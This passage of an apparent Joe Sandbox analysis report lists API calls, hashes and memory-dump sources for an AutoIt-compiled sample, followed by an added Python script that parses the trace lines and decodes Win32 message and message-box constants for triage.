                                                                                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                    APIs
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
• Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
• Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
• Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D
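The API traces in the two function entries above (FindWindowW/PostMessageW against Shell_TrayWnd, and the MessageBoxW call with the "Error allocating memory." / "AutoIt" strings) are printed by Joe Sandbox with every immediate as a raw 8-digit hex value, so the reader has to decode them by hand: 00000111 is WM_COMMAND, 00000197 is command ID 407 sent to the taskbar window, 00000010 is MB_ICONERROR, and a MessageBoxW whose caption is "AutoIt" is the AutoIt runtime's own out-of-memory handler, which places this code in the AutoIt runtime rather than in the dropped payload. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it parses this report's "APIs" line format (including the "Part of subcall function" rows and the "?" placeholders for non-constant arguments), decodes the constants, and emits the two findings a triage analyst would want. It assumes the line grammar shown above; the sample trace embedded in it is constructed from the five API lines of these entries. Because the trace is static, the HWND passed to PostMessageW is not a known constant (it prints as 00000000), so the script pairs the PostMessageW with the FindWindowW that precedes it in the same function by order, not by handle value.

```python
"""Parse Joe Sandbox 'APIs' trace lines and decode the Win32 constants in them.

Added example for this report; the trace format is assumed from the lines
printed in the report, and SAMPLE_TRACE is constructed from them.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample: the five API lines of the two function entries above.
SAMPLE_TRACE = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix, then
# API.MODULE(args) or API.MODULE (no args, as for _doexit.LIBCMT), then "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 constants the decoder knows; values are the documented Windows SDK ones.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND", 0x0112: "WM_SYSCOMMAND"}
MB_ICON_FLAGS = {0x10: "MB_ICONERROR", 0x20: "MB_ICONQUESTION",
                 0x30: "MB_ICONWARNING", 0x40: "MB_ICONINFORMATION"}

Arg = Union[int, str, None]   # hex immediate, string literal, or '?' (not a constant)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int
    subcall_of: Optional[int] = None   # address of the subcall function, if any


def parse_arg(tok: str) -> Arg:
    """'?' means the argument is computed at run time; 8 hex digits is an immediate."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok   # string literal; note: literals containing a comma would be split


def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # not an API row (headings, memory-dump rows, etc.)
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def analyze(calls: List[ApiCall]) -> List[str]:
    """Decode the constants and describe what each window/message-box call does."""
    findings = []
    last_window_class = None   # class name from the most recent FindWindowW
    for c in calls:
        if c.api == "FindWindowW" and c.args and isinstance(c.args[0], str):
            last_window_class = c.args[0]
        elif c.api in ("PostMessageW", "SendMessageW") and len(c.args) >= 4:
            msg, wparam = c.args[1], c.args[2]
            name = WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")
            target = last_window_class or "unknown window"
            findings.append(f"{c.api} sends {name} wParam={wparam} (0x{wparam:X}) "
                            f"to {target} at 0x{c.ref:08X}")
        elif c.api == "MessageBoxW" and len(c.args) >= 4:
            text, caption, flags = c.args[1], c.args[2], c.args[3]
            icon = MB_ICON_FLAGS.get(flags & 0xF0, f"0x{flags:X}")
            findings.append(f"MessageBoxW caption={caption!r} text={text!r} "
                            f"{icon} at 0x{c.ref:08X}")
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_trace(SAMPLE_TRACE)):
        print(finding)
```

Run stand-alone it prints one line for the WM_COMMAND posted to Shell_TrayWnd (wParam 407) and one for the AutoIt runtime's error box; feeding it the full "APIs" section of a report lets the same decoder pick out every window-message and message-box call without reading hex by hand.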